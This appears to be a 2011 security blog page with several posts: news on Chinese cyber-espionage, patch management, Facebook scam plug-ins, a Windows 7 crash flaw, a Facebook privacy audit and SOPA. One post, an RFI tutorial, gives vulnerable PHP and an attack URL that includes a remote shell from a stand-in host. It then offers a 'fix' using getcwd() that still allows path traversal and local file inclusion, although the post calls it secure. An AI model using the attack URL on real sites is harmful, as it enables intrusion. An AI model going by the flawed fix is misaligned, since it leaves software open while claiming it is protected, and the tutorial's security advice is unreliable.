Ads 468x60px

Featured Posts

12/25/2011

Hidden Dragon: The Chinese cyber menace !

Analysis Cybercrooks and patriotic state-backed hackers in China are collaborating to create an even more potent security threat, according to researchers.



Profit-motivated crooks are trading compromised access to foreign governments' computers, which they are unable to monitise, for exploits with state-sponsored hackers. This trade is facilitated by information broker middlemen, according to Moustafa Mahmoud, president of The Middle East Tiger Team.

Mahmoud has made an extensive study of the Chinese digital underground that partially draws on material not available to the general public, such as books published by the US Army's Foreign Military Studies Office, to compile a history of hacking in China. His work goes a long way to explain the threat of cyber-espionage from China that has bubbled up towards the top of the political agenda over recent months.
The first Chinese hacking group was founded in 1997 but disbanded in 2000 after a financial row between some of its principal players led to a lawsuit. At its peak the organisation had about 3,000 members, according to Mahmoud. The motives of this so-called Red Hacker group were patriotic, defending motherland China against its enemies.

The hacking the US Embassy and the White House over the accidental bombing of the Chinese Embassy in Belgrade back in 1999 brought many flag-waving Chinese hackers together to, as they saw it, defend the honour of the motherland and fight imperialism in cyberspace.

This role was taken over by the Honker Union of China (HUC) after 2000, and the HUC later became the mainstay of the Red Hacker Alliance. China’s so-called “red hackers” attack critics of the state and infiltrate foreign government and corporate sites – among other activities. The phenomenon of patriotic hackers is far from restricted to China and also exists in Russia, for example. Russian hackers tend to make greater use of defacement and botnets to silence critics rather than spying.

Enter the Dragon

Over more recent years, different groups – which are involved in cybercrime to make money rather than patriotic hacking – have emerged in China, some of which are affiliated with the Triads. These groups are involved in running so-called bulletproof hosting operations, providing services for other phishing fraudsters and the like that ignore takedown notices that ethical ISPs would comply with - as well as various botnet-powered scams, spam and paid-for DDoS attacks for hire. "These firms did not target Chinese firms and were are therefore not prosecuted," Mahmoud explained.

Over the years patriotic hacker groups and criminal hackers have forged alliances, a process facilitated by the Chinese government and in particular the Peoples' Liberation Army, according to Mahmoud. One landmark event in this process was the defacement of Western targets and similar cyber-attacks following the downing of a Chinese jet by US warplanes in 2001. These attacks promptly ceased after they were denounced by the People's Daily, the organ of the ruling Communist Party.

The Chinese government began to see the potential of cyberspace at around this time and established a PLA hacking corp, as Mahmoud described it, featuring hand-picked soldiers who showed talent for cyber-security.

Mahmoud said that despite the existence of this corps the Chinese often prefer to use "freelance hackers" for "plausible deniability". "We can talk about hackers but it's better to talk about businessmen selling secrets. An entire underground industry has grown up to support cybercrime," he said.

There are various roles within such group including malware distribution, bot master, account brokers and "most importantly vulnerability researchers, whose collective ingenuity has been applied to run attacks against Western targets and to develop proprietary next-generation hacking tools", according to Mahmoud.
Small groups, including the Network Crack Program Hacker (NCPH), that research gaping security holes and develop sophisticated malware strains are reportedly sponsored by the PLA.

Western governments, hi-tech firms, oil exploration outfits and military targets have variously been targeted in a expanding series of so-called Advanced Persistent Threat (APT) cyber-attacks, commonly featuring Trojan backdoors, over the years. These operations have been known as TitanRain, ShadyRAT and Night Dragon, among others.

"It's sometimes difficult to differentiate between state-sponsored and industrial espionage attacks but what's striking is that all these attacks happen between 9am and 5pm Chinese time," Mahmoud noted.

Gaining access to industrial secrets is part of a deliberate targeted government plan, Programme 863, whose mission aim is to make Chinese industry financially independent of foreign technology. It also has a military dimension. "China sees cyberspace as a way of compensating for its deficiency in conventional warfare, for example by developing strategies to cripple communication networks," Mahmoud said. "That does not mean China wants to fight. Inspired by the ideas of Sun Tzu [author of The Art of warfare] China regards it as a superior strategy to break the enemy without having to fight."

North Korea is also developing expertise in cyber-warfare, running training schools that resemble those run in China. However there is little or no collaboration between the two countries, according to Mahmoud.
"The Chinese see their expertise in cyberspace as an edge they are not willing to share. That's why there is no collaboration with hackers outside the country."

The Wall Street Journal reported last Tuesday that US authorities have managed to trace several high-profile hacking attacks, including assaults against RSA Security and defence contractor Lockheed Martin, back to China. Information obtained during an attack on systems behind RSA's SecurID tokens was later used in a failed attack against Lockheed Martin.

"US intelligence officials can identify different groups based on a variety of indicators," the WSJ reports. "Those characteristics include the type of cyberattack software they use, different internet addresses they employ when stealing data, and how attacks are carried out against different targets. In addition to US government agencies, major targets of these groups include US defence contractors."

US investigators working for the National Security Agency have reportedly identified twenty groups of hackers, a dozen of which have links to China's People's Liberation Army. Others are affiliated to Chinese universities. In total, several hundred people are said to be involved in the attacks, some of whom have been individually identified. The information has helped to strengthen the US's hand in diplomatic negotiations with China.

The data also provides a list of targets for possible counter-attacks.
Bloomberg reports in a similar vein that China is engaged in an undeclared cyber Cold War against Western targets with the goal (unlike the Soviet-era Cold War) of stealing intellectual property rather than destabilising regimes or fostering communism.

Targets have included tech giants such as Google and Intel to iBahn, selected because it supplies Wi-Fi technology to hotels frequented by Western execs, oil exploration biz bosses and government and defence contractors. Chinese hackers stand accused of stealing anything and everything that isn't nailed down from as many as 760 different corporations over recent years resulting losses in intellectual property valued in the billions.

Paper tiger, hidden Trojan

Recent reports have painted a conflicting picture of Chinese cyber-warfare capabilities. A recent report [PDF] by The Office of the National Counterintelligence Executive (ONCIX), which was presented to Congress, named and shamed China and Russia for running cyber-espionage campaigns geared towards stealing the US's technology and economic secrets. The report, straightforwardly titled Foreign Spies Stealing US Economic Secrets in Cyberspace, described China as the source of the majority of intrusions without blaming its government directly.

Some observers suggest that the US intelligence community has decided to publicly finger China and Russia over cyber-espionage only after diplomatic efforts failed to yield a result.

China routinely and angrily denies any involvement in cyber-espionage, arguing that it is frequently victimised by these types of attacks itself, and most recently said that it wanted to help improve cyber-security defences across all nations.

Regardless of what's happening elsewhere we've frequently heard praise for the staffers of China's computer emergency response centres. Over several years various businesses and teams in the country have been more pro-active and helpful in working with organisations, such as Spamhaus, in dealing with spam.

However evidence showing that Chinese denials over the use of hacking tools ought not to be taken at face value emerged unexpectedly earlier this year. An extract from a propaganda film illustrated the use of custom tools to hack websites run by the banned spiritual movement Falun Gong. The video named the PLA's Electrical Engineering University as the source of the utility.

Security experts who have visited China praise its universities. HD Moore, the developer of Metasploit and chief security officer at Rapid7, said: "They are focused on defending China and malware research."

Moore, who toured computer science departments in universities in Beijing and elsewhere, found students frequently had an aptitude for malware analysis, and saw the potential for work in this area. However those with expertise in exploit development were "few and far between", he said. "Not that many people in China are doing penetration testing work either," he added.

A recent report by the Australian National University concludes that China's cyber-warfare capabilities, at least, are actually mediocre at best. Desmond Ball, a professor at the Australian National University, argues China's offensive capabilities are limited. Local internet systems are notable for their deficiencies and vulnerabilities, he adds.

Information security experts, particularly with an intelligence background remain wary of China's capabilities.
Prescott Winter, chief technology officer for the public sector at HP ArcSight and former NSA associate deputy director of national intelligence for information integration, said that China remains a major threat.
"China is a major player in cyber-espionage. It has a well-constructed underground economy that is targeting intellectual property. Western governments are also at the front line," he said, adding that hackers often cause collateral damage when they access and ransack targeted networks.

Other former intelligence officials argue that the focus on China hides the greater truth that everyone is engaged in cyber-espionage.

"Every country (especially China, Russia, and even our allies), engages in industrial espionage against the United States and each other," writes Marcus Carey, who worked for the NSA for eight years before joining Rapid7 as a security researcher and community manager.

"For these countries, cyber-espionage is likely just the tip of the iceberg, very much complementing the main areas of espionage being conducted in the physical world," he said. "It’s much cheaper for foreign governments to 'borrow' research and development information and go straight into production, particularly in countries like China and India where there is a strong supply of industrial low-wage workers to crank out products. For this and other reasons, espionage is certainly not a new practice, rather the internet has simply made it more visible and traceable."

"The truth is, a good espionage program is vital to a country's success, as we saw during WWII and the Cold War. It is the responsibility of governing agencies to perform espionage against other countries, as well as helping their own citizens with counter-espionage and cyber defense strategies," he added.
Carey, paraphrasing baseball legend Mark Grace on cheating, concludes "countries that aren't engaging in espionage aren't trying hard enough!" ®

Hacknote

Dexter fans may like to know that the Chinese characters for hacker transliterate to Dark Visitor. A blog of the same name is one of the best online resources keeping hype-free tabs on the Chinese cybercrime scene.

12/23/2011

Security : Fixing RFI Vulnerability !!

Hello !

I was wondering, why most of  WebMasters don't Fix Vulnerabilities on thier Websites ?. And yet complains from hackers ??. Perhaps they don't know, but, why would they open a website if they don't know ?!! why won't they learn?!

So for that i created this article, to help you learning one way of Fixing your websites Vulnerabilities without needing anyone :D. and todays Vulnerability is : RFI.

A lot of you will ask :  what is RFI ?

Answer : RFI is an abbreviation of " Remote File Inclusion ", it's a Vulnerability or Security Error that allowed others (Hackers & Crackers) to include a file (mostly Shell File) to your website in order to hack it of course.

Question : How will they include file in my website without even uploading it ?!!

Answer : too easy !, most of RFI Vulnerability will appear like this :

<?php
// coded by Tahar ZoFix for training porposes
if(empty($_GET['insert'])){
echo "Please Choose a File";
} else {
include($_GET['insert']);
}
?>


And in the URL :

www.yourwebsite.com/xxxx.php?yyyy=File

with : xxxx = name of a file ( in here : view.php)
         yyyy = in here insert

Ok, now to utilise this Error, i will do like this :

www.yourwebsite.com/xxxx.php?yyyy=http://target.com/shell.txt?

with :  http://target.com/shell.txt? : is where the shell was uploaded on format TXT (really important) and in after the sign '?' ( it means apply the php codes inside the file, also really important).

So now to Fix it, you have to make sure that the file is in your server,

to do that :



<?php
// coded by Tahar ZoFix for training porposes
if(empty($_GET['insert'])){
echo 
"Please Choose a File";
} else {
include(
getcwd() . $_GET['insert']);
}
?>


The code above will make sure that, the file is in your server, and you will avoid the RFI Error.

For time shorting, and to make the article short and understandable, i passed some steps not  really important and it won't do anything in the contenu of the article.

I hope you find it easy to understand, and if there any requets, do not hesitate to contact me :).

Lesson By; Tahar ZoFix

Sahara Security Blog.

12/22/2011

Clever patching keeps the system serviceable !

t was the kind of day most systems administrators would like to forget. A customer of Canadian security consultant David Lewis, founder of the Liquidmatrix Security Digest, had decided to roll out a software patch to a Symantec product.




Unfortunately, the firm didn’t check the patch as well as it could have and the tweak disabled its firewalls.
Patch management looks easy but can cause nightmares if not handled properly, says Lewis, who warns that companies should never rely completely on automation.

You will always need a human element,” he says.

The patch management challenge intensifies as the number of applications in an enterprise grows. Microsoft’s update service does a good job of looking after its own applications, but takes you only so far.
Third-party applications are harder to pinpoint and manage, and they represent roughly two-thirds of the problem. In 2010, 69 per cent of the sources of vulnerabilities on endpoints were found to have originated with third-party programs.

In 2006, patching Microsoft applications and the operating system on the average endpoint would have eliminated 55 per cent of vulnerabilities. In 2010, it got rid of just 31 per cent.

Take Adobe, for example. The company has suffered from several serious vulnerability exploits over the years, one of which appeared in September. A zero-day in the Flash player makes it possible for attackers to take control of a machine and the firm admitted that it was being exploited in the wild.

Adobe’s PDF reader has also had critical vulnerabilities, and fleeing to alternatives such as FoxIT’s PDF Reader doesn’t help. It, too, has suffered from vulnerability issues.

Fast work

In addition to patches that break systems in weird ways, time management can also be an issue. In many companies, the window available to take down systems for planned maintenance is shrinking, so patches must be rolled out faster.

However, Kamel Patel, a UK practice manager at giant IT services company Dimension Data, claims the last time he had to install a patch on a machine that needed a mandatory reboot was a while back. The move to the cloud, he argues, has made patch management easier.

“Some of the issues when you installed a patch and it overrode another file are reduced,” he says.
Not everyone buys the Utopian idea of patch-free IT departments. “So, why did Google and Adobe get nailed using IE 6?" asks Lewis.

Both companies were compromised during 2009 by zero-day attacks that exploited Internet Explorer 6 in an onslaught known as Operation Aurora. These companies were running a browser a couple of generations older than the one currently available.

Why?” asks Emerson Tan, founder of PacketStorm, an online community that collects vulnerabilities and exploits. “Because nobody has bothered to fix their corporate intranets. Upgrading to something with most of the flaws fixed will simply break their internal apps."

Enveloping cloud

Brian Bourne, founder of Sector, a security conference taking place in Toronto in October, is equally sceptical that cloud-based apps escape patch management issues.

You have less control because you have to move forward when they say so," he says.

Cloud-based application vendors update their software regularly without customer input. As an enterprise user, you may be able to stay on an earlier revision for a while by negotiating with the vendor, but that won’t last forever.

You might have written something that interfaces with its application. Or there may be some feature it removed or altered that you were dependent on but which it figured no customers were using," says Bourne.

Other challenges include the consumerisation of IT, which encourages employees and contractors to bring in devices such as tablets and smartphones.

Making sure these are adequately patched creates a whole new set of problems, landing us in the sticky area of network access control, network quarantine and policy servers to manage the whole tangled mess.
Smaller businesses have an easier time, according to Patel. “It's pretty straightforward," he says. “Just accept everything from Windows Update."

For many small companies, this will be adequate. But every so often, a patch appears that takes down a piece of software. For example, Microsoft's recent gaffe, in which it accidentally decided that Google Chrome was a piece of malware, caused problems for many users.
For many companies the cost of
setting up a proper test bed may be prohibitive
Ideally, customers will test everything before deploying a patch. But for many companies the cost of setting up a proper test bed and maintaining a configuration management database may be prohibitive, if not from a capital expenditure perspective, then simply because they don't have the internal nous to get the job done.

Examination fatigue

Many companies are settling for a compromise, Patel suggests. Rather than testing a patch to death with a variety of different configurations they give it quick once-over.

You might try it out on test machines and if after a week users aren’t experiencing problems, you release it to the whole estate," he says.

Some companies may simply wait for two weeks to see if any adverse reactions to new patches turn up elsewhere, and if not, they deploy. It all depends on the level of risk that the company is comfortable with.
Ultimately, any patching strategy involves at least some human interaction, but the key lies in minimising fuss by adopting a mature approach to IT.

For example, any change management process can be made simpler by adopting just one or two images for corporate desktops, rather than juggling many desktop builds. Reporting software can also illustrate the effects of changes and help ensure that a deployment has succeeded, with minimal impact on the infrastructure.

Maintaining the reliability of your systems involves attention to detail and a refined approach to change management. Do you have what it takes?

Facebook scams now spread by dodgy browser plug-ins !!

Con men have developed a new approach towards spreading scams on Facebook.



Instead of using status updates as a lure, the latest generation of Facebook scams attempt to trick marks into installing malicious browser extensions. The plug-ins are supposedly needed to view non-existent video clips supposedly posted by an earlier victim.

Once installed, these malign browser ad-ons spread the scam from one user's profile to another's profiles.
Elad Sharf, security researcher at Websense Security labs, explains: “Scam pages typically utilise social engineering tricks such as enticing you with videos or a free voucher. In this new scam you’re encouraged to install a browser plugin.

"The plugin is an integral part of how the scam is spread and has the ability to propagate by posting in your name on friends' pages. As much as these offers look tempting, if you’re asked to install plug-ins in order to get vouchers or watch a video – remember it could be a trick to spread scams, spam and malware.”

The bogus extensions come as add-ons for both Firefox and Chrome. More details of the scam, including screenshots, can be found in a blog post by Websense here.

12/21/2011

A simple HTML tag will crash 64-bit Windows 7

An unpatched critical flaw in 64-bit Windows 7 leaves computers vulnerable to a full 'blue screen of death' system crash.



The memory corruption bug in x64 Win 7 could also allow malicious kernel-level code to be injected into machines, security alert biz Secunia warns. Fortunately the 32-bit version of Windows 7 is immune to the flaw, which has been pinned down to the win32k.sys operating system file - which contains the kernel portion of the Windows user interface and related infrastructure.

Proof-of-concept code showing how to crash vulnerable Win 7 boxes has been leaked: the simple HTML script, when opened in Apple's Safari web browser, quickly leads to the kernel triggering a page fault in an unmapped area of memory, which halts the machine at a blue screen of death.

The offending script is just an IFRAME tag with an overly large height attribute. Although Safari is required to spark the system crash via HTML, modern operating systems should not allow usermode applications to bring down the machine. Microsoft is now investigating the vulnerability, which was first reported by Twitter user w3bd3vil, although the software giant is racing against hackers tracing the code execution path to discover the underlying vulnerability in Windows 7.

A video of the Safari-triggered crash along with the HTML PoC can be seen here. Other exploit scenarios might also be possible.

Irish gov - Facebook's 'Darwinian' nature keeps users safe

Facebook's handling of its user data in Ireland is legitimate, the Irish data protection commissioner's office said today.



The DPA released a 149-page audit report detailing the outcome of a privacy inspection carried out by the information commission in Ireland.

“The audit has found a positive approach and commitment on the part of Facebook Ireland Ltd to respecting the privacy rights of its users, said Irish Data Protection Commissioner Billy Hawkes.
"Arising from the audit, Facebook-Ireland has agreed to a wide range of 'best practice' improvements to be implemented over the next 6 months, with a formal review of progress to take place in July of next year,” he added.

His deputy, Gary Davis, led the audit that was announced in September, following a number of privacy complaints brought against Facebook, whose international headquarters are in Dublin, Ireland, that were submitted to the Commission.

An Austria-based collective called Europe versus Facebook filed 22 complaints with the Irish data protection commissioner. Among other things, the group griped about Facebook's "Like" button that – it was revealed by Oz blogger Nik Cubrilovic – had carried cookies that included unique information after people had logged out of the dominant social network.
At the time, Facebook said it had "quickly" fixed the issue, but insisted there was no privacy or security breach.

As The Register pointed out in September, Facebook farms all the data it stores back to its spiritual homeland in the US.

But while a privacy audit in Ireland might have appeared significant given that the Irish data protection commissioner's office was the nearest responsible DPA outside of the firm's US headquarters, the reality was that Facebook isn't breaching European law.

Davis, who wants to see "improvements" from Facebook, acknowledged that in the audit document, seen by El Reg, and published later today. The Irish DPA described the dominant social network as having "an almost Darwinian nature", which meant it should have "robust mechanisms" in place. But the commissioner's office indicated today that it wants to see Facebook be at the forefront of data privacy online.

"Taking a leadership position that moves from compliance with the law to the achievement of best practice is for Facebook Ireland to decide but if it continues to display the commitment I witnessed throughout the audit process it is certainly achievable,” said Davis.
The report issued recommendations to Facebook and asked it to "commit" to implementing "best practice" across the company's site:
  • a mechanism for users to convey an informed choice for how their information is used and shared on the site including in relation to Third Party Apps;
  • a broad update to the Data Use Policy/Privacy Policy to take account of recommendations as to where the information provided to users could be further improved;
  • transparency and control for users via the provision of all personal data held to them on request and as part of their everyday interaction with the site;
  • the deletion of information held on users and non-users via what are known as social plugins and more generally the deletion of data held from user interactions with the site much sooner than presently;
  • increased transparency and controls for the use of personal data for advertising purposes;
  • an additional form of notification for users in relation to facial recognition/”tag suggest” that is considered will ensure Facebook Ireland is meeting best practice in this area from an Irish law perspective an enhanced ability for users to control tagging and posting on other user profiles;
  • an enhanced ability for users to control whether their addition to Groups by friends; and
  • the Compliance management/Governance function in Dublin which will be further improved and enhanced to ensure that the introduction of new products or new uses of user data take full account of Irish data protection law.
Facebook is expected to implement those commitments over the next six months, said the Irish DPA. An agreed "formal review" will undertaken by the commissioner's office in July next year. However, there are various examples throughout the audit report of Facebook batting back recommendations from the watchdog.
On the contentious issue of photo-tagging, Facebook simply said it would "examine the broader implications" of the issue during the July 2012 review.
The social network added in the report: "Facebook firmly believes that it has struck the right balance in terms of product development and user control" when it comes to use of its facial recognition tech.
On the issue of individual users having their profile pictures and names displayed in third-party ads, Facebook said it would " enter into discussions" with the commission "in advance of any plans to introduce such functionality."
The Irish data regulator had asked Facebook to consider gaining consent from its users before implementing such a feature.
Facebook EMEA policy wonk Richard Allan said: "Facebook has committed to either implement, or to consider, other 'best practice' improvements recommended by the commission, even in situations where our practices already comply with legal requirements. Meeting these commitments will require intense work over the next six months."

US constitution - legal eagles, Anti-piracy laws will smash internet

     Legal Experts in US said, that The Stop Online Piracy Act (SOPA) and the proposed PROTECT IP, will damage the world's DNS system.


    Legal experts are warning that the proposed PROTECT IP and the Stop Online Piracy Act (SOPA) legislation, currently working their way through Congress, will damage the world's DNS system, cripple attempts to get better online security and violate free speech rights in the US constitution.

In an essay published in the Stanford Law Review professors Mark Lemley, David Levine and David Post warned that the overarching reach of the legislation would cause people to seek alternatives to the existing DNS system, manufacture massive technical problems in the implementation of DNSSEC and trample over rights of free expression by allowing the total suppression of published opinion based on allegations without proof, or even a hearing.

“These bills, and the enforcement philosophy that underlies them, represent a dramatic retreat from this country’s tradition of leadership in supporting the free exchange of information and ideas on the internet,” the trio warn.

Under the terms of the proposed PROTECT IP legislation a US federal prosecutor who finds a foreign website that is “dedicated to infringing activities” can force all US internet service providers, domain name registries, domain name registrars and operators of domain name servers to block either the offending page or the whole web domain from the DNS system* - effectively wiping the site off the internet map.
The professors warn that the SOPA legislation is even worse in this regard. “Under SOPA, IP rights holders can proceed vigilante-style against allegedly offending sites, without any court hearing or any judicial intervention or oversight whatsoever… and all of this occurs based upon a notice delivered by the rights holder, which no neutral third party has even looked at, let alone adjudicated on the merits,” they write.
The team also echoes concerns from Sandia Labs and others that the laws would break the implementation of DNSSEC. Those companies using the secure protocol could find themselves liable for legal action, some experts have warned, and would encourage the formation of new, unregulated DNS systems that would fracture the overall structure of the internet.

From a legal standpoint the proposed laws are almost certainly unconstitutional, the trio warns, since it can be used to deprive first amendment free speech rights without any access to a court hearing and with little or no evidence presented of a crime – indeed overseas website owners may not even be informed before a site is taken down.

Who is leading the fightback?

Some of the biggest names in the internet world have rallied to fight the current round of legislation, including some unlikely bedfellows. Vint Cerf and other leading luminaries have warned of the dangers, Google, Facebook and other online businesses are battling against it and Mozilla is mobilizing the open-source community. Even the Business Software Alliance has opposed it – and when the software industry’s anti-piracy goon squad doesn't like copyright legislation you know it has to be seriously flawed.

News of the proposed changes has even reached China, where it is inspiring some bloggers to take the piss out of America for copying the Great Firewall of China. Weiping Li, a blogger with Global Voices Advocacy, told The Register that the similarities between the two countries were amusing some.
“Now they’re copying us to build up a wall. It’s like after climbing over the wall, we then bump into another one. It’s crazy!” said one web scribbler.

Even the legislators themselves are expressing concern at the lack of technical expertise they can access during House Judiciary Committee hearings on the bills and the speed with which they are being asked to act.

“When we had that last hearing, there wasn't a single person who could answer the technical questions, and they all admitted that, even though a couple of them still opined,” complained California congressman Dan Lungren.

"But that is very unsatisfactory to me, and it ought to be very unsatisfactory to this committee, and it certainly ought to be very unsatisfactory to this institution. This is an extremely important issue. We better do it right, and I would just hope that we would take the time to do that.” ®

Bootnote

DNS, for the uninitiated, is the vital system that points browsers at websites when given a human-readable address, such as facebook.com or theregister.co.uk. Get removed from the DNS system and you can kiss goodbye to your traffic.